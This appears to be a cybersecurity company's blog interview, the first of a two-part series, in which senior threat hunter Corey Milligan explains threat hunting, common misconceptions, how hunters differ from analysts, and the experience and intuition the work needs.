In the ever-evolving domains of cyber attack and defense, automated detection has never been enough. Traditional rule/signature-based detection methods have a key weakness that causes them to lag behind the attacks that they detect: they are based on attacks that have already been observed, investigated, and reported. The time required to detect an attack, in particular, is the primary reason threat hunting is critical.
Threat hunting is rooted in the scientific method, requiring a hypothesis, a rigorous investigation and observation methodology, and clear, concise, unembellished documentation. In addition to the deep technical skill needed, truly effective threat hunting also requires instinct, curiosity, creativity, and finesse that is partly innate to the hunter and partly borne from years of experience administering and defending systems and networks.
Profile of Corey Milligan: Sr. Threat Hunter
Corey Milligan is a senior threat hunter at Cysiv and a retired Army Cyber Corps Warrant Officer. Corey has over nineteen years of expertise in information systems and security, including threat intelligence, intrusion detection and analysis, network and host forensics, event correlation, data engineering, and malware analysis. Before joining Cysiv in 2019, he was a senior threat intelligence analyst and lead threat hunter at Armor Defense. Immediately prior to that, he served in the United States Army Cyber Protection Brigade, where he provided technical leadership and mentorship as the Cyber Operations Planner for a Cyber Protection Team.
In Part 1 of this two-part series, Corey introduces threat hunting and why, for the most effective threat hunters, it is both a science and an art.
Q: What role does threat hunting play in protecting an organization?
Corey Milligan: It really depends on what you want to get out of your threat hunting program. There are multiple valuable outcomes to a threat hunting program that will benefit any organization, including identifying gaps in security controls and sensor coverage, injecting a greater level of threat intelligence into existing security processes, validating and enhancing existing detection capabilities, detecting previously undetected attacks, and supporting incident response and forensics.
Q: What are the common misconceptions about threat hunting?
Milligan: The biggest one is that hiring a threat hunter will instantly take your security level from 0 to 100. I understand that hiring a threat hunter is a big investment, but thinking that they will be able to solve all of your security problems overnight is unrealistic. If your organization’s security maturity is on the low end, and you hire a qualified threat hunter, you have essentially hired a highly qualified security consultant. If, however, your organization has a mature security program, having implemented good asset and software management, access controls, data and network redundancy, and host and network monitoring, a qualified threat hunter will take your program to the next level by helping you identify security gaps you didn’t know existed and the 10 percent of attacks, the advanced attacks, that you didn’t know were targeting you and may have already penetrated your network.
Q: Why has threat hunting become so important?
Milligan: It’s because more and more organizations recognize two things. First, that the cost of a breach, especially in this era of data privacy regulation, and digital transformation, far exceeds the cost of a defense-in-depth security strategy. And second, they’ve recognized that threat hunting is an essential part of a proactive strategy. The core tenet of threat hunting is, “assume the breach.” So, if you have a mature security program that is ready to implement threat hunting, it will take you beyond the reactionary, delayed nature of rule/signature-based security tools to help you to proactively identify attacks that your tools are either missing or that you are not noticing. This capability is essential today because attackers are constantly evolving their tactics and tools. Relying on rule/signature-based tools is tantamount to accepting that your organization is constantly unprotected from the most advanced attackers. Understandably, some organizations are willing to depend on a 90% solution that automated detection and response tools can provide. What they may not realize is that the other 10% represents the most catastrophic of outcomes. From a risk management point of view, a threat hunter is an important mitigation for the most catastrophic attacks.
Q: What differentiates a threat hunter from a security analyst?
Milligan: It's the level of experience and knowledge. Obviously, security analysts can have a range of experience, but a threat hunter will have years of experience at all levels of host and network management, security analysis, threat intelligence and vulnerability management. And an effective threat hunter will have good knowledge of attacker methodology and an understanding of how to map business processes to the underlying IT infrastructure. If you have someone in your organization that has these skills and experience, especially the attacker and organizational insight, you likely already have a measure of threat hunting, however informal, going on in your organization.
A lot of what a threat hunter will do goes beyond looking for known techniques. I circle back to something from my military days to explain this mindset. There are the known-knowns, the known-unknowns, and the unknown-unknowns. The known-knowns are those attacker tactics and tools that are well covered by the rule/signature-based tools. Where the threat hunters come in is on the unknown side. The known-unknowns are those attacker tactics and tools that are known, but have been modified to elude signature-based detection, are being used in an unexpected way, or are so similar to normal activity that a signature-based detection/prevention capability would do more harm than good. “Next generation” tools that implement machine learning are beginning to cover some of the known-unknowns, but you still need someone with the experience of a threat hunter to validate the findings. Finally, unknown-unknowns source from previously unobserved tactics and tools. Items that fall into this category include the exploitation of unknown vulnerabilities, novel, or mostly novel, attacker tactics and tools, and the exploitation of normal network or host functionality in a novel way. Depending on the sophistication and patience of the attacker, these will almost always emerge and be detected as anomalies.
Q: That covers the science of threat hunting. What’s the art of it?
Milligan: Like any profession, there's an art to it once you get to a certain level. The automation and machine learning discussion around threat hunting is focused on the science. The art aspect is what I think differentiates the really good threat hunters from the rest. It comes down to instinct and intuition rooted in experience and an insatiable curiosity. A qualified threat hunter has deep experience spanning multiple domains across IT and security, and the ability to bring more context to what they are seeing. It’s no different by the time you reach the highest levels of any profession, including threat hunting. You will have developed an innate understanding of your craft to the point that you barely have to think about it. That’s where it becomes instinct and intuition. Curiosity is a big differentiator as well — that desire to be constantly learning and to keep pulling every string until you find an answer.
Read more in Part 2, where Corey will discuss the specifics of a successful threat hunt, how Cysiv’s platform supports threat hunting, and how threat hunting will evolve.